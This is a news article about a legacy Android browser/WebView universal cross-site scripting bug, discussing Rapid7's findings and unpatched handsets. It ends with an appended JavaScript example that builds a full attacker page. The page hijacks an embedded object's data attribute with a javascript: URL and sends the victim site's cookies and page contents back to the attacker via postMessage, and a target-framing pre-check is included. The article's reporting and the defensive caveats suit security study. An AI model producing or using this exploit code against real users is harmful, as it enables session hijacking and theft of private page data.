Legacy Android bug leaves billions of smartphones and tablets exposed

Universal Cross-site Scripting Vulnerability

The vulnerability, which affects the WebView component, occurs “when replacing the ‘data’ attribute of a given HTML object with a JavaScript URL scheme,” explained Tod Beardsley, technical lead for the Metasploit framework. The swapped-in script runs in the origin of the site loaded into that object rather than in the attacker's, so an attacker can leverage the UXSS flaw to scrape cookie data and page contents from a target site through the victim's browser window, Rapid7 said. Because the attack needs the target rendered inside the attacker's page, the company noted that target URLs served with an X-Frame-Options header, which tells the browser to refuse framing and embedding, are not affected. The security hole can be exploited in all versions of the Android Open Source Project (AOSP) browser, and in other apps that embed the same WebView component.

Drawback of being Open Source

Google did release a patch for this flaw. However, a major drawback of the way the Android ecosystem works is that it is up to the manufacturers to propagate updates to their users, and a majority of them do not bother to do so. This is felt every time Google releases a new version of Android, and the pinch is being felt now. Since most manufacturers may not bother with the update, millions who are using an older version of Android are left stuck with this vulnerability indefinitely, unless they buy a new handset that ships with the latest version, Android 5.0 Lollipop. But these users generally belong to the lower-mid and mid-range segments and could not afford the latest handset in the first place, so buying a new one isn't really an option for them. “For many, many people, buying a new phone just isn’t practical; the people who are most likely affected by ‘legacy’ Android bugs are the same people who couldn’t afford a fancy ‘latest’ Android handset in the first place,” Beardsley said in a blog post. “In other words, it looks like a billion phones aren’t going to see this patch any time soon, if ever. It’s nice that the patch exists, but Google doesn’t seem to have any practical way of getting it out to the world.”

Proof of Concept

The following is the proof of concept. The PoC is easy to follow for anyone with some JavaScript background; for the uninitiated, Rafay has given the following breakdown.

Proof of Concept Using a postMessage Call

The following PoC uses the HTML5 postMessage call to send document.cookie and the page's innerHTML from the target's origin back to the main (attacker's) window.

Vulnerable Code

Rafay has also given the code below, a window.onmessage handler in the receiving window that alerts whatever the injected script posts back; it is reproduced here:

window.onmessage = function(m){ alert(m.data); }

If you are a security researcher or a white-hat hacker, you can download the Metasploit module for the Android browser UXSS from here. Remember to use Metasploit only if you are familiar with it. Other PoCs and the fix have been given by Rafay on his blog, linked below.

Resource: Rafay Hacking Articles
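Since the PoC itself is not reproduced on this page, the attack flow described in the sections above (an HTML object whose data attribute is swapped for a javascript: URL, a postMessage call carrying document.cookie and innerHTML back to the main window, and the onmessage receiver) is shown here as an added example in JavaScript. It is not Rafay's PoC or Rapid7's module. The target host, the decision to swap the attribute on the object's load event, and the function names are this example's assumptions; the page-building and X-Frame-Options checks are plain functions so they can be exercised outside a browser. On a patched WebView the swapped-in script no longer runs in the target's origin, so nothing is exfiltrated.

```javascript
// Added example (not Rafay Baloch's PoC or Rapid7's module) illustrating the
// UXSS flow described in the article. Target host and function names are
// assumptions made for illustration.

// Script the attacker wants to run in the victim's origin: post the cookies
// and page body to the top window, which is the attacker's own page.
function exfilScript() {
  return "window.top.postMessage(document.cookie + '\\n' + document.body.innerHTML, '*')";
}

// The javascript: URL that will replace the <object> element's data attribute.
function javascriptUrl(script) {
  return 'javascript:' + script;
}

// Minimal HTML attribute escaping for the target URL placed in the markup.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Attacker page. The target is loaded in an <object>; once it has loaded, the
// data attribute is replaced with the javascript: URL (the "replacing the data
// attribute" step from Beardsley's description). The onmessage handler is the
// receiver one-liner from the article. Swapping on the load event is this
// example's choice, not something the article specifies.
function buildAttackerPage(targetUrl) {
  return [
    '<object id="victim" data="' + escapeAttr(targetUrl) + '"></object>',
    '<script>',
    '  window.onmessage = function (m) { alert(m.data); };',
    '  var o = document.getElementById("victim");',
    '  o.onload = function () { o.data = ' + JSON.stringify(javascriptUrl(exfilScript())) + '; };',
    '</script>'
  ].join('\n');
}

// The attack needs the target rendered inside the attacker's page, so a target
// that forbids framing is out of reach (Rapid7's X-Frame-Options caveat).
// Given the target's response headers with lower-cased names, report whether
// embedding from an arbitrary attacker origin is refused. ALLOW-FROM permits
// only the one named origin, so it also blocks an attacker's page.
function framingBlocked(headers) {
  var xfo = headers['x-frame-options'];
  if (xfo === undefined || xfo === null) return false;
  var v = String(xfo).trim().toUpperCase();
  return v === 'DENY' || v === 'SAMEORIGIN' || v.indexOf('ALLOW-FROM ') === 0;
}
```

Calling buildAttackerPage('http://target.example/account') yields the markup an attacker would host; framingBlocked is the pre-check a tester would run against the target's headers before bothering, since a DENY or SAMEORIGIN response means the object never renders the target. The receiver deliberately has no event.origin check because it is the attacker's own page expecting data from the victim origin; a legitimate application receiving postMessage data should always check event.origin.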